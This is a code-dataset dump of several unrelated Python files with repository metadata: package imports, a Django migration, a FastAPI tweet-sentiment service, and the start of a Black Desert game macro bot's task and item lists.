requests.get(f'http://localhost:5000/errors?error={e}') | 41.346154 | 138 | 0.568372 | 330 | 3,225 | 5.554545 | 0.221212 | 0.078014 | 0.120567 | 0.096017 | 0.77305 | 0.727223 | 0.727223 | 0.701037 | 0.701037 | 0.639935 | 0 | 0.030017 | 0.276899 | 3,225 | 78 | 139 | 41.346154 | 0.756003 | 0 | 0 | 0.625 | 0 | 0 | 0.348365 | 0.026675 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041667 | false | 0.402778 | 0.069444 | 0 | 0.152778 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
eb8d26ed65479479d5bce9dba2d8faa1aec5c8c2 | 137 | py | Python | learn-py/listas-py/a12.py | cassiocamargos/Python | 14caf13145ee9c6807d572aac0af7497b00767e8 | [
"MIT"
] | null | null | null | learn-py/listas-py/a12.py | cassiocamargos/Python | 14caf13145ee9c6807d572aac0af7497b00767e8 | [
"MIT"
] | null | null | null | learn-py/listas-py/a12.py | cassiocamargos/Python | 14caf13145ee9c6807d572aac0af7497b00767e8 | [
"MIT"
] | null | null | null | # 12 - Write a program to calculate the average stock of a part, given that: AVERAGE STOCK = (MINIMUM_QUANTITY + MAXIMUM_QUANTITY) / 2. | 137 | 137 | 0.766423 | 21 | 137 | 4.904762 | 0.857143 | 0.23301 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026087 | 0.160584 | 137 | 1 | 137 | 137 | 0.869565 | 0.985401 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6
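The a12.py record above contains only the exercise statement, average stock = (minimum quantity + maximum quantity) / 2, with no code. A minimal solution sketch:

```python
def average_stock(min_quantity, max_quantity):
    """Average stock of a part: (minimum + maximum) / 2."""
    return (min_quantity + max_quantity) / 2


print(average_stock(40, 60))  # 50.0
```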
cced38e106e82759e27c6295d2876d1b63875dad | 34 | py | Python | models/ops/depthconv/functions/__init__.py | E18301194/DepthAwareCNN | 8ae98f7f18b69f79e7df03397dec2543d3d0c8eb | [
"MIT"
] | 278 | 2018-05-09T03:08:56.000Z | 2022-03-10T08:05:10.000Z | models/ops/depthconv/functions/__init__.py | jfzhang95/DepthAwareCNN | 2076c751279637f112d9ea9ce33459b6f3b20063 | [
"MIT"
] | 35 | 2018-05-31T15:42:44.000Z | 2022-03-17T09:36:13.000Z | models/ops/depthconv/functions/__init__.py | jfzhang95/DepthAwareCNN | 2076c751279637f112d9ea9ce33459b6f3b20063 | [
"MIT"
] | 80 | 2018-06-03T10:04:48.000Z | 2022-03-05T12:57:31.000Z | from .depthconv import depth_conv
| 17 | 33 | 0.852941 | 5 | 34 | 5.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 34 | 1 | 34 | 34 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6905bbadb5b1f1db3200d748c41164c657cc5724 | 94 | py | Python | torchFI/__init__.py | bfgoldstein/tiny_torchfi | 82b0f4931ff8aac6079122200fbe61782bb1f0da | [
"Apache-2.0"
] | null | null | null | torchFI/__init__.py | bfgoldstein/tiny_torchfi | 82b0f4931ff8aac6079122200fbe61782bb1f0da | [
"Apache-2.0"
] | null | null | null | torchFI/__init__.py | bfgoldstein/tiny_torchfi | 82b0f4931ff8aac6079122200fbe61782bb1f0da | [
"Apache-2.0"
] | 1 | 2021-05-17T00:48:03.000Z | 2021-05-17T00:48:03.000Z | from .modules import *
from .bitflip import *
from .injection import *
from .fi_train import * | 23.5 | 24 | 0.755319 | 13 | 94 | 5.384615 | 0.538462 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.159574 | 94 | 4 | 25 | 23.5 | 0.886076 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6927717cf5be474676ee5c6dd6c85608b5861f6c | 53 | py | Python | python/src/main/python/pyalink/alink/common/types/catalog/__init__.py | wenwei8268/Alink | c00702538c95a32403985ebd344eb6aeb81749a7 | [
"Apache-2.0"
] | null | null | null | python/src/main/python/pyalink/alink/common/types/catalog/__init__.py | wenwei8268/Alink | c00702538c95a32403985ebd344eb6aeb81749a7 | [
"Apache-2.0"
] | null | null | null | python/src/main/python/pyalink/alink/common/types/catalog/__init__.py | wenwei8268/Alink | c00702538c95a32403985ebd344eb6aeb81749a7 | [
"Apache-2.0"
] | null | null | null | from .catalog import *
from .catalog_object import *
| 17.666667 | 29 | 0.773585 | 7 | 53 | 5.714286 | 0.571429 | 0.55 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150943 | 53 | 2 | 30 | 26.5 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
695135b91e9e98f31ed88c8722447e9b598e3e85 | 41 | py | Python | whitehole/__init__.py | heligp/whitehole | 1e64e07e07416dbecac7326604afc653302d7044 | [
"MIT"
] | 2 | 2021-02-10T06:13:53.000Z | 2022-02-10T21:53:50.000Z | whitehole/__init__.py | heligp/whitehole | 1e64e07e07416dbecac7326604afc653302d7044 | [
"MIT"
] | null | null | null | whitehole/__init__.py | heligp/whitehole | 1e64e07e07416dbecac7326604afc653302d7044 | [
"MIT"
] | 1 | 2020-11-22T21:24:59.000Z | 2020-11-22T21:24:59.000Z | from whitehole.decryptor import Decryptor | 41 | 41 | 0.902439 | 5 | 41 | 7.4 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.073171 | 41 | 1 | 41 | 41 | 0.973684 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6970c5544f187c68f2678ee7d60b746deba4bbba | 56 | py | Python | pyecho/__init__.py | itsnauman/echo | 367db9764000a1518e835dbdacaf177892b50594 | [
"MIT"
] | 8 | 2015-04-20T16:47:39.000Z | 2021-01-14T04:07:11.000Z | pyecho/__init__.py | itsnauman/echo | 367db9764000a1518e835dbdacaf177892b50594 | [
"MIT"
] | null | null | null | pyecho/__init__.py | itsnauman/echo | 367db9764000a1518e835dbdacaf177892b50594 | [
"MIT"
] | 1 | 2015-04-21T11:52:29.000Z | 2015-04-21T11:52:29.000Z | from .echo import echo
from .echo import FailingTooHard
| 18.666667 | 32 | 0.821429 | 8 | 56 | 5.75 | 0.5 | 0.347826 | 0.608696 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 56 | 2 | 33 | 28 | 0.958333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
15c3488c3a54bc843858a2efca16451e4c18dac5 | 80 | py | Python | DaVinciAccess/__init__.py | andostini/DailiesPipe | 06dedfa30b7d12ff795a9267d13b2f5c6106c986 | [
"MIT"
] | 1 | 2021-12-08T09:16:27.000Z | 2021-12-08T09:16:27.000Z | DaVinciAccess/__init__.py | andostini/SilverstackAccess | 06dedfa30b7d12ff795a9267d13b2f5c6106c986 | [
"MIT"
] | 1 | 2021-08-10T13:24:41.000Z | 2021-08-10T13:24:41.000Z | DaVinciAccess/__init__.py | andostini/DailiesPipe | 06dedfa30b7d12ff795a9267d13b2f5c6106c986 | [
"MIT"
] | 1 | 2021-01-29T15:23:27.000Z | 2021-01-29T15:23:27.000Z | from DaVinciAccess.DaVinciAccess import Project, getProjects, getSubfolderByName | 80 | 80 | 0.9 | 7 | 80 | 10.285714 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 80 | 1 | 80 | 80 | 0.96 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c62f171a532186cdbdaa09e7f725a456aec5331b | 2,601 | py | Python | exams/migrations/0027_auto_20210806_0955.py | ankanb240/otis-web | 45eda65b419705c65c02b15872a137969d53d8e9 | [
"MIT"
] | 15 | 2021-08-28T18:18:37.000Z | 2022-03-13T07:48:15.000Z | exams/migrations/0027_auto_20210806_0955.py | ankanb240/otis-web | 45eda65b419705c65c02b15872a137969d53d8e9 | [
"MIT"
] | 65 | 2021-08-20T02:37:27.000Z | 2022-02-07T17:19:23.000Z | exams/migrations/0027_auto_20210806_0955.py | ankanb240/otis-web | 45eda65b419705c65c02b15872a137969d53d8e9 | [
"MIT"
] | 31 | 2020-01-09T02:35:29.000Z | 2022-03-13T07:48:18.000Z | # Generated by Django 3.2.5 on 2021-08-06 13:55
from django.db import migrations, models
import exams.models
class Migration(migrations.Migration):
dependencies = [
('exams', '0026_auto_20210806_0126'),
]
operations = [
migrations.AlterField(
model_name='examattempt',
name='guess1',
field=models.CharField(blank=True, max_length=18, validators=[exams.models.expr_validator], verbose_name='Problem 1 response'),
),
migrations.AlterField(
model_name='examattempt',
name='guess2',
field=models.CharField(blank=True, max_length=18, validators=[exams.models.expr_validator], verbose_name='Problem 2 response'),
),
migrations.AlterField(
model_name='examattempt',
name='guess3',
field=models.CharField(blank=True, max_length=18, validators=[exams.models.expr_validator], verbose_name='Problem 3 response'),
),
migrations.AlterField(
model_name='examattempt',
name='guess4',
field=models.CharField(blank=True, max_length=18, validators=[exams.models.expr_validator], verbose_name='Problem 4 response'),
),
migrations.AlterField(
model_name='examattempt',
name='guess5',
field=models.CharField(blank=True, max_length=18, validators=[exams.models.expr_validator], verbose_name='Problem 5 response'),
),
migrations.AlterField(
model_name='practiceexam',
name='answer1',
field=models.CharField(blank=True, max_length=64, validators=[exams.models.expr_validator_multiple]),
),
migrations.AlterField(
model_name='practiceexam',
name='answer2',
field=models.CharField(blank=True, max_length=64, validators=[exams.models.expr_validator_multiple]),
),
migrations.AlterField(
model_name='practiceexam',
name='answer3',
field=models.CharField(blank=True, max_length=64, validators=[exams.models.expr_validator_multiple]),
),
migrations.AlterField(
model_name='practiceexam',
name='answer4',
field=models.CharField(blank=True, max_length=64, validators=[exams.models.expr_validator_multiple]),
),
migrations.AlterField(
model_name='practiceexam',
name='answer5',
field=models.CharField(blank=True, max_length=64, validators=[exams.models.expr_validator_multiple]),
),
]
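The migration references `exams.models.expr_validator`, whose body is not shown here. A hypothetical validator in that spirit (the real one likely raises Django's `ValidationError`; `ValueError` is used below to keep the sketch dependency-free):

```python
import re

# Hypothetical validator in the spirit of exams.models.expr_validator (the
# real implementation is not shown above): accept only characters that could
# appear in a short math-expression answer.
EXPR_RE = re.compile(r"[0-9+\-*/^ ().a-zA-Z]*")


def expr_validator(value):
    if not EXPR_RE.fullmatch(value):
        raise ValueError(f"{value!r} is not a valid expression answer")


expr_validator("3*(4+5)")  # passes silently
try:
    expr_validator("3; rm -rf")
except ValueError as exc:
    print(exc)
```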
| 40.015385 | 139 | 0.627835 | 262 | 2,601 | 6.068702 | 0.221374 | 0.076101 | 0.157233 | 0.18239 | 0.852201 | 0.84717 | 0.791195 | 0.660377 | 0.660377 | 0.660377 | 0 | 0.034021 | 0.254133 | 2,601 | 64 | 140 | 40.640625 | 0.785567 | 0.017301 | 0 | 0.603448 | 1 | 0 | 0.11668 | 0.009005 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.034483 | 0 | 0.086207 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d667ef990de1ca58ac5bf4fd84e847aa4f4f5031 | 130 | py | Python | jobs/blast/query2tree.py | OSC/pseudofun | fce05e37dcba713d2c3f622b295350cfdd46b9e1 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | jobs/blast/query2tree.py | OSC/pseudofun | fce05e37dcba713d2c3f622b295350cfdd46b9e1 | [
"CC-BY-4.0",
"MIT"
] | 7 | 2018-05-24T14:18:10.000Z | 2022-02-26T03:56:41.000Z | jobs/blast/query2tree.py | OSC/pseudofun | fce05e37dcba713d2c3f622b295350cfdd46b9e1 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | #!/bin/python
import alignment_toolbox
import sys
alignment_toolbox.generate_tree(sys.argv[2], sys.argv[1], True, sys.argv[3])
| 16.25 | 76 | 0.761538 | 21 | 130 | 4.571429 | 0.619048 | 0.21875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02521 | 0.084615 | 130 | 7 | 77 | 18.571429 | 0.781513 | 0.092308 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
d6984892ef25dfbf9c1c281e89c74ebb6fa0cf56 | 158 | py | Python | chapter2/code/os module/platform_version.py | gabrielmahia/ushuhudAI | ee40c9822852f66c6111d1d485dc676b6da70677 | [
"MIT"
] | 74 | 2020-05-19T01:08:03.000Z | 2022-03-31T14:00:41.000Z | chapter2/code/os module/platform_version.py | gabrielmahia/ushuhudAI | ee40c9822852f66c6111d1d485dc676b6da70677 | [
"MIT"
] | 1 | 2021-06-04T06:08:21.000Z | 2021-06-04T06:08:21.000Z | chapter2/code/os module/platform_version.py | gabrielmahia/ushuhudAI | ee40c9822852f66c6111d1d485dc676b6da70677 | [
"MIT"
] | 47 | 2020-05-05T12:06:31.000Z | 2022-03-10T04:45:01.000Z | from platform import python_implementation, python_version_tuple
print(python_implementation())
for attribute in python_version_tuple():
print(attribute)
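`python_version_tuple()` returns the version components as strings, so joining them with dots reconstructs the same string that `platform.python_version()` reports:

```python
from platform import python_version, python_version_tuple

# python_version_tuple() yields (major, minor, patchlevel) as *strings*,
# so a "."-join reproduces the dotted version string.
major, minor, patch = python_version_tuple()
dotted = ".".join((major, minor, patch))
print(dotted)
```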
| 31.6 | 64 | 0.841772 | 19 | 158 | 6.684211 | 0.578947 | 0.314961 | 0.283465 | 0.362205 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094937 | 158 | 4 | 65 | 39.5 | 0.888112 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
d6a0cdd879873e62447a4e9dabd5d1fab47a6078 | 3,833 | py | Python | index.py | FrostGod/Twitter-Sentimental-Analysis | a186d955b1441bae6ec423a89d4c5779d6390d63 | [
"MIT"
] | null | null | null | index.py | FrostGod/Twitter-Sentimental-Analysis | a186d955b1441bae6ec423a89d4c5779d6390d63 | [
"MIT"
] | null | null | null | index.py | FrostGod/Twitter-Sentimental-Analysis | a186d955b1441bae6ec423a89d4c5779d6390d63 | [
"MIT"
] | null | null | null | from fastapi import FastAPI
import fetch_tweets as ft
import csv
import os
import json
app = FastAPI()
def make_json(csvFilePath, jsonFilePath, tweets):
data = {}
print("making json file")
with open(csvFilePath, encoding='utf-8') as csvf:
csvReader = csv.DictReader(csvf)
cnt = 0
for rows in csvReader:
key = cnt
temp = dict()
# print(tweets[cnt])
temp["tweet"] = tweets[cnt][1]
data[key] = rows
data[key].update(temp)
cnt += 1
with open(jsonFilePath, 'w', encoding='utf-8') as jsonf:
jsonf.write(json.dumps(data, indent=4))
@app.get("/topic/{Topic}")
def topic(Topic: str, models: str):
models = models.split(',')
print(models)
tweets = ft.get_tweets(Topic)
print(tweets)
filename = "new_tweets.csv"
with open(filename, 'w') as csvfile:
csvwriter = csv.writer(csvfile)
csvwriter.writerows(tweets)
os.system("python3 ./code/preprocess.py new_tweets.csv")
if "bl" in models:
os.system("python3 ./code/baseline.py")
make_json('./baseline.csv', './bl.json', tweets)
with open('bl.json') as json_file:
data = json.load(json_file)
return data
if "svm" in models:
print("svm")
os.system("python3 ./code/svm.py")
make_json('./svm.csv', './svm.json', tweets)
with open('svm.json') as json_file:
data = json.load(json_file)
return data
if "dt" in models:
os.system("python3 ./code/decisiontree.py")
make_json('./decisiontree.csv', './dt.json', tweets)
with open('dt.json') as json_file:
data = json.load(json_file)
return data
if "rf" in models:
os.system("python3 ./code/randomforest.py")
make_json('./randomforest.csv', './rf.json', tweets)
with open('rf.json') as json_file:
data = json.load(json_file)
return data
if "nb" in models:
os.system("python3 ./code/naivebayes.py")
make_json('./naivebayes.csv', './nb.json', tweets)
with open('nb.json') as json_file:
data = json.load(json_file)
return data
@app.get("/tweet/{tweet}")
def analyze_tweet(tweet: str, models: str):  # renamed from a second "topic" to avoid shadowing the handler above
print("hi")
models = models.split(',')
print(models)
# tweets = ft.get_tweets(Topic)
tweets = [[0, tweet]]
filename = "new_tweets.csv"
with open(filename, 'w') as csvfile:
csvwriter = csv.writer(csvfile)
csvwriter.writerows(tweets)
os.system("python3 ./code/preprocess.py new_tweets.csv")
if "bl" in models:
os.system("python3 ./code/baseline.py")
make_json('./baseline.csv', './bl.json', tweets)
with open('bl.json') as json_file:
data = json.load(json_file)
return data
if "svm" in models:
os.system("python3 ./code/svm.py")
make_json('./svm.csv', './svm.json', tweets)
with open('svm.json') as json_file:
data = json.load(json_file)
return data
if "dt" in models:
os.system("python3 ./code/decisiontree.py")
make_json('./decisiontree.csv', './dt.json', tweets)
with open('dt.json') as json_file:
data = json.load(json_file)
return data
if "rf" in models:
os.system("python3 ./code/randomforest.py")
make_json('./randomforest.csv', './rf.json', tweets)
with open('rf.json') as json_file:
data = json.load(json_file)
return data
if "nb" in models:
os.system("python3 ./code/naivebayes.py")
make_json('./naivebayes.csv', './nb.json', tweets)
with open('nb.json') as json_file:
data = json.load(json_file)
return data
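The five model branches above repeat the same run-script / convert-CSV / load-JSON pattern with only the file names changing. A minimal sketch of a table-driven refactor — `MODEL_SCRIPTS` and `pick_model` are assumed names, not part of the original code:

```python
# Hypothetical lookup table mirroring the if-chain above:
# model key -> (training script, csv output, json output).
MODEL_SCRIPTS = {
    "bl": ("./code/baseline.py", "./baseline.csv", "./bl.json"),
    "svm": ("./code/svm.py", "./svm.csv", "./svm.json"),
    "dt": ("./code/decisiontree.py", "./decisiontree.csv", "./dt.json"),
    "rf": ("./code/randomforest.py", "./randomforest.csv", "./rf.json"),
    "nb": ("./code/naivebayes.py", "./naivebayes.csv", "./nb.json"),
}

def pick_model(models):
    # Return the artifacts for the first requested model, preserving the
    # early-return priority order of the original if-chain (bl first).
    for key in ("bl", "svm", "dt", "rf", "nb"):
        if key in models:
            return key, MODEL_SCRIPTS[key]
    return None, None
```

The endpoint body could then run one `os.system`/`make_json`/`json.load` sequence on whatever `pick_model` returns instead of duplicating the block per model.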
| 31.418033 | 60 | 0.573702 | 494 | 3,833 | 4.374494 | 0.147773 | 0.077742 | 0.083295 | 0.105507 | 0.769088 | 0.769088 | 0.769088 | 0.769088 | 0.769088 | 0.769088 | 0 | 0.006874 | 0.278894 | 3,833 | 121 | 61 | 31.677686 | 0.774964 | 0.012523 | 0 | 0.711538 | 0 | 0 | 0.20862 | 0.023268 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028846 | false | 0 | 0.048077 | 0 | 0.173077 | 0.057692 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ba38a47970de24cff91878efadc678361604b915 | 59 | py | Python | Modulo/ModulosPacotes.py | andrezzadede/Curso-de-Python-POO | 7b3f892b78271e53543451e2896da5e47e79f87f | [
"MIT"
] | null | null | null | Modulo/ModulosPacotes.py | andrezzadede/Curso-de-Python-POO | 7b3f892b78271e53543451e2896da5e47e79f87f | [
"MIT"
] | null | null | null | Modulo/ModulosPacotes.py | andrezzadede/Curso-de-Python-POO | 7b3f892b78271e53543451e2896da5e47e79f87f | [
"MIT"
] | null | null | null | import math
print(math.sqrt(25))
print(math.factorial(5)) | 11.8 | 24 | 0.745763 | 10 | 59 | 4.4 | 0.7 | 0.409091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.055556 | 0.084746 | 59 | 5 | 24 | 11.8 | 0.759259 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
ba900b5bb8f5ca791cb78f18eaa740d215e05412 | 23 | py | Python | csv2yaml/__init__.py | sepandhaghighi/csv2yaml | cbacd12cee3e6a168cef56a57f7aad77e934f3a2 | [
"MIT"
] | 12 | 2017-09-13T21:36:22.000Z | 2021-03-09T06:28:48.000Z | csv2yaml/__init__.py | sepandhaghighi/csv2yaml | cbacd12cee3e6a168cef56a57f7aad77e934f3a2 | [
"MIT"
] | 1 | 2019-07-03T07:16:39.000Z | 2019-07-03T07:16:39.000Z | csv2yaml/__init__.py | sepandhaghighi/csv2yaml | cbacd12cee3e6a168cef56a57f7aad77e934f3a2 | [
"MIT"
] | 2 | 2019-06-19T08:46:35.000Z | 2020-07-13T03:54:18.000Z | from .csv2yaml import * | 23 | 23 | 0.782609 | 3 | 23 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.05 | 0.130435 | 23 | 1 | 23 | 23 | 0.85 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
baa6847316fba96a12088e1b06bdbddcef8584a6 | 178,789 | py | Python | likeyoubot_blackdesert.py | dogfooter-master/dogfooter | e1e39375703fe3019af7976f97c44cf2cb7ca0fa | [
"MIT"
] | null | null | null | likeyoubot_blackdesert.py | dogfooter-master/dogfooter | e1e39375703fe3019af7976f97c44cf2cb7ca0fa | [
"MIT"
] | null | null | null | likeyoubot_blackdesert.py | dogfooter-master/dogfooter | e1e39375703fe3019af7976f97c44cf2cb7ca0fa | [
"MIT"
] | null | null | null | import likeyoubot_game as lybgame
import likeyoubot_blackdesert_scene as lybscene
from likeyoubot_configure import LYBConstant as lybconstant
import time
import sys
import tkinter
from tkinter import ttk
from tkinter import font
import copy
class LYBBlackDesert(lybgame.LYBGame):
    work_list = [
        '게임 시작',
        '로그인',
        '메인 퀘스트',
        '자동 사냥',
        # '이야기',
        '우편함',
        '과제',
        '길드',
        '교감',
        '말 가방에 넣기',
        '말 가방 모두 꺼내기',
        '낚시',
        '투기장',
        '인사하기',
        '영지',
        '영지로 이동',
        '영지 나가기',
        '마을로 이동',
        '가축상점',
        '교본상점',
        '토벌 게시판',
        '이벤트 보상 수령',
        '캐릭터 변경',
        '캐릭터 이동',
        '도감',
        '기술 성장',
        '월드 보스',
        '흑정령 - 흑정령 의뢰',
        '흑정령 - 검은 기운',
        '흑정령 - 잠재력 돌파',
        '흑정령 - 수정 합성',
        '흑정령 - 광원석 합성',
        '반려동물 - 먹이주기',
        '미궁 개척',
        '미궁 목록',
        '마우스 클릭',
        '알림',
        '[반복 시작]',
        '[반복 종료]',
        '[작업 대기]',
        '[작업 예약]',
        '',
    ]
    nox_bd_icon_list = [
        'nox_bd_icon',
        'nox_bd_icon2',
        'bd_icon3',
    ]
    momo_bd_icon_list = [
        'momo_bd_icon',
        'momo_bd_icon2',
        'bd_icon3',
    ]
    potion_list = [
        '소형',
        '중형',
        '대형',
    ]
    box_range_list = [
        '좁게',
        '중간',
    ]
    ddolmani_skill_list = [
        "흑정령의 분노:흡수",
        "흑정령의 분노I",
        "흑정령의 분노II",
    ]
    sell_pummok_list = [
        "무기",
        "방어구",
        "장신구",
        "수정",
        "물약",
    ]
    item_rank_list = [
        "낡은",
        "일반",
        "고급",
        "희귀",
        "유일",
        "전설",
        "신화",
    ]
    item_rank_color_list = [
        "#7d7d86",
        "#000000",
        "#759460",
        "#4880b6",
        "#433e6f",
        "#d49e4a",
        "#de5f21",
    ]
    character_move_list = [
        "↑",
        "↗",
        "→",
        "↘",
        "↓",
        "↙",
        "←",
        "↖",
    ]
    sujeong_rank_list = [
        '일반',
        '고급',
        '희귀',
        '유일',
        '전설',
    ]
    geomun_rank_list = [
        '낡은',
        '일반',
        '고급',
        '희귀',
        '유일',
        '전설',
        '신화',
        '심연',
    ]
    chejip_list = [
        '야생 들풀',
        '저마',
        '목화 솜',
        '누에고치',
        '통나무',
        '연한 원목',
        '가벼운 원목',
        '탄력있는 원목',
        '거친 석재',
        '구리 광석',
        '철 광석',
        '주석 광석',
        '설정 안함',
    ]
    chejip_place_list = [
        '1 지역',
        '2 지역',
        '3 지역',
        '4 지역',
    ]
    jamjeryeok_dolpa_rank_list = [
        '하급',
        '중급',
        '상급',
        '최상급',
    ]
    jamjeryeok_dolpa_rank_order_list = [
        '낮은',
        '높은',
    ]
    npc_list = [
        '잡화상점',
        '가축상점',
        '씨앗상점',
        '교본상점',
    ]
    migung_rank_op_list = [
        '=',
        '≥',
    ]
    tobeol_boss_list = [
        '빨간코',
        '기아스',
        '비겁한 베그',
        '알 룬디',
        '티티움',
        '머스칸',
        '오르그',
        '켈카스',
        '검은갈기',
        '사우닐 공성대장',
        '게아쿠',
        '쿠베',
        '우라카',
        '헥세마리',
        '카부아밀레스',
        '사형 집행관',
        '일레즈라의 하수인',
